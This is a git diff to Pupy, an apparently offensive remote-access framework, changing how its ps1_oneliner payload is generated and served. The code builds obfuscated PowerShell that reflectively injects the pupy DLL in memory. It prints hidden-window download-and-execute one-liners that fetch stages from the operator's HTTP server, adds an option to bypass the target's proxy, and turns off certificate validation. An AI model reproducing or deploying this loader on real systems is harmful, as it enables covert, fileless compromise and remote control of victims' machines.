diff --git a/pupy/pupygen.py b/pupy/pupygen.py index 2b99e6b3..ba813bb7 100755 --- a/pupy/pupygen.py +++ b/pupy/pupygen.py @@ -291,6 +291,8 @@ if __name__=="__main__": parser.add_argument('-s', '--scriptlet', default=[], action='append', help="offline python scriptlets to execute before starting the connection. Multiple scriptlets can be privided.") parser.add_argument('-l', '--list', action=ListOptions, nargs=0, help="list available formats, transports, scriptlets and options") parser.add_argument('-i', '--interface', default=None, help="The default interface to listen on") + parser.add_argument('--no-use-proxy', action='store_true', help="Don't use the target's proxy configuration even if it is used by target (for ps1_oneliner only for now)") + parser.add_argument('--ps1-oneliner-listen-port', default=8080, type=int, help="Port used by ps1_oneliner listener (default: %(default)s)") parser.add_argument('--randomize-hash', action='store_true', help="add a random string in the exe to make it's hash unknown") parser.add_argument('--debug-scriptlets', action='store_true', help="don't catch scriptlets exceptions on the client for debug purposes") parser.add_argument('--workdir', help='Set Workdir (Default = current workdir)') @@ -435,9 +437,11 @@ if __name__=="__main__": w.write("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1], x64InitCode, x64ConcatCode[:-1]) )) elif args.format=="ps1_oneliner": from pupylib.payloads.ps1_oneliner import serve_ps1_payload - i=conf["launcher_args"].index("--host")+1 - link_ip=conf["launcher_args"][i].split(":",1)[0] - serve_ps1_payload(conf, link_ip=link_ip) + link_ip=conf["launcher_args"][conf["launcher_args"].index("--host")+1].split(":",1)[0] + if args.no_use_proxy == True: + serve_ps1_payload(conf, link_ip=link_ip, port=args.ps1_oneliner_listen_port, useTargetProxy=False) + else: + serve_ps1_payload(conf, link_ip=link_ip, port=args.ps1_oneliner_listen_port, useTargetProxy=True) elif args.format=="rubber_ducky": rubber_ducky(conf).generateAllForOStarget() else: diff --git a/pupy/pupylib/payloads/ps1_oneliner.py b/pupy/pupylib/payloads/ps1_oneliner.py index 24204170..88287188 100644 --- a/pupy/pupylib/payloads/ps1_oneliner.py +++ b/pupy/pupylib/payloads/ps1_oneliner.py @@ -19,31 +19,32 @@ ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),"..","..")) #url_random_one = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(5)) #url_random_two = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(5)) -### url_random_one and url_random_two variables are fixed because if you break you ps1_neliner listener, the payload will be not be able to get stages -:( + +### "url_random_one" and "url_random_two" variables are fixed because if you break you ps1_listener listener, the ps1_listener payload will not be able to get stages -:( url_random_one = "eiloShaegae1" url_random_two = "IMo8oosieVai" def getInvokeReflectivePEInjectionWithDLLEmbedded(payload_conf): - ''' - Return source code of InvokeReflectivePEInjection.ps1 script with pupy dll embedded - Ready for executing - ''' - SPLIT_SIZE = 100000 - x64InitCode, x86InitCode, x64ConcatCode, x86ConcatCode = "", "", "", "" - code = """ - $PEBytes = "" - {0} - $PEBytesTotal = [System.Convert]::FromBase64String({1}) - Invoke-ReflectivePEInjection -PEBytes $PEBytesTotal -ForceASLR - """#{1}=x86dll - binaryX86=b64encode(get_edit_pupyx86_dll(payload_conf)) - binaryX86parts = [binaryX86[i:i+SPLIT_SIZE] for i in range(0, len(binaryX86), SPLIT_SIZE)] - for i,aPart in enumerate(binaryX86parts): - x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart) - x86ConcatCode += "$PEBytes{0}+".format(i) - print(colorize("[+] ","green")+"X86 pupy dll loaded and {0} variables generated".format(i+1)) - script = obfuscatePowershellScript(open(os.path.join(ROOT, "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read()) - return obfs_ps_script("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1]))) + ''' + Return source code of InvokeReflectivePEInjection.ps1 script with pupy dll embedded + Ready for executing + ''' + SPLIT_SIZE = 100000 + x64InitCode, x86InitCode, x64ConcatCode, x86ConcatCode = "", "", "", "" + code = """ + $PEBytes = "" + {0} + $PEBytesTotal = [System.Convert]::FromBase64String({1}) + Invoke-ReflectivePEInjection -PEBytes $PEBytesTotal -ForceASLR + """#{1}=x86dll + binaryX86=b64encode(get_edit_pupyx86_dll(payload_conf)) + binaryX86parts = [binaryX86[i:i+SPLIT_SIZE] for i in range(0, len(binaryX86), SPLIT_SIZE)] + for i,aPart in enumerate(binaryX86parts): + x86InitCode += "$PEBytes{0}=\"{1}\"\n".format(i,aPart) + x86ConcatCode += "$PEBytes{0}+".format(i) + print(colorize("[+] ","green")+"X86 pupy dll loaded and {0} variables generated".format(i+1)) + script = obfuscatePowershellScript(open(os.path.join(ROOT, "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1"), 'r').read()) + return obfs_ps_script("{0}\n{1}".format(script, code.format(x86InitCode, x86ConcatCode[:-1]))) def create_ps_command(ps_command, force_ps32=False, nothidden=False): ps_command = """[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; @@ -88,9 +89,16 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler): self.send_response(200) self.send_header('Content-type','text/html') self.end_headers() - - launcher = """ - IEX (New-Object Net.WebClient).DownloadString('http://{server}:{port}/{url_random_two}');""".format( + if self.server.useTargetProxy == True: + print colorize("[+] ","green")+"Stage 1 configured for using target's proxy configuration" + launcher = """IEX (New-Object Net.WebClient).DownloadString('http://{server}:{port}/{url_random_two}');""".format( + server=self.server.link_ip, + port=self.server.link_port, + url_random_two=url_random_two + ) + else: + print colorize("[+] ","green")+"Stage 1 configured for NOT using target's proxy configuration" + launcher = """$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString('http://{server}:{port}/{url_random_two}'));""".format( server=self.server.link_ip, port=self.server.link_port, url_random_two=url_random_two @@ -115,12 +123,13 @@ class PupyPayloadHTTPHandler(BaseHTTPRequestHandler): return class ps1_HTTPServer(HTTPServer): - def __init__(self, server_address, conf, link_ip, link_port, ssl): + def __init__(self, server_address, conf, link_ip, link_port, ssl, useTargetProxy): self.payload_conf = conf self.link_ip=link_ip self.link_port=link_port self.aes_key=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,16)]) # must be 16 char long for aes 128 self.random_reflectivepeinj_name=''.join([random.choice(string.ascii_lowercase+string.ascii_uppercase+string.digits) for _ in range(0,random.randint(8,12))]) # must be 16 char long for aes 128 + self.useTargetProxy = useTargetProxy HTTPServer.__init__(self, server_address, PupyPayloadHTTPHandler) if ssl: config = configparser.ConfigParser() @@ -129,11 +138,11 @@ class ps1_HTTPServer(HTTPServer): certfile=config.get("pupyd","certfile").replace("\\",os.sep).replace("/",os.sep) self.socket = wrap_socket (self.socket, certfile=certfile, keyfile=keyfile, server_side=True) -def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="", ssl=False): +def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="", ssl=False, useTargetProxy=True): try: while True: try: - server = ps1_HTTPServer((ip, port), conf, link_ip, port, ssl) + server = ps1_HTTPServer((ip, port), conf, link_ip, port, ssl, useTargetProxy) break except Exception as e: # [Errno 98] Adress already in use @@ -143,11 +152,16 @@ def serve_ps1_payload(conf, ip="0.0.0.0", port=8080, link_ip="", ssl=Fa raise print colorize("[+] ","green")+"copy/paste this one-line loader to deploy pupy without writing on the disk :" print " --- " - oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')\""%(link_ip, port, url_random_one), "green") - # This line could work check when proxy is used (have to be tested) - # oneliner=colorize("powershell.exe -w hidden -noni -nop -c $K=new-object net.webclient;$K.proxy=[Net.WebRequest]::GetSystemWebProxy();$K.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $K.downloadstring('http://%s:%s/pa')"%(link_ip, port), "green") + if useTargetProxy == True: + oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://%s:%s/%s')\""%(link_ip, port, url_random_one), "green") + message=colorize("Please note that if the target's system uses a proxy, this previous powershell command will download/execute pupy through the proxy", "yellow") + else: + oneliner=colorize("powershell.exe -w hidden -noni -nop -c \"$w=(New-Object System.Net.WebClient);$w.Proxy=[System.Net.GlobalProxySelection]::GetEmptyWebProxy();iex($w.DownloadString('http://%s:%s/%s'));\""%(link_ip, port, url_random_one), "green") + message= colorize("Please note that even if the target's system uses a proxy, this previous powershell command will not use the proxy for downloading pupy", "yellow") print oneliner print " --- " + print message + print " --- " print colorize("[+] ","green")+'Started http server on %s:%s '%(ip, port) print colorize("[+] ","green")+'waiting for a connection ...'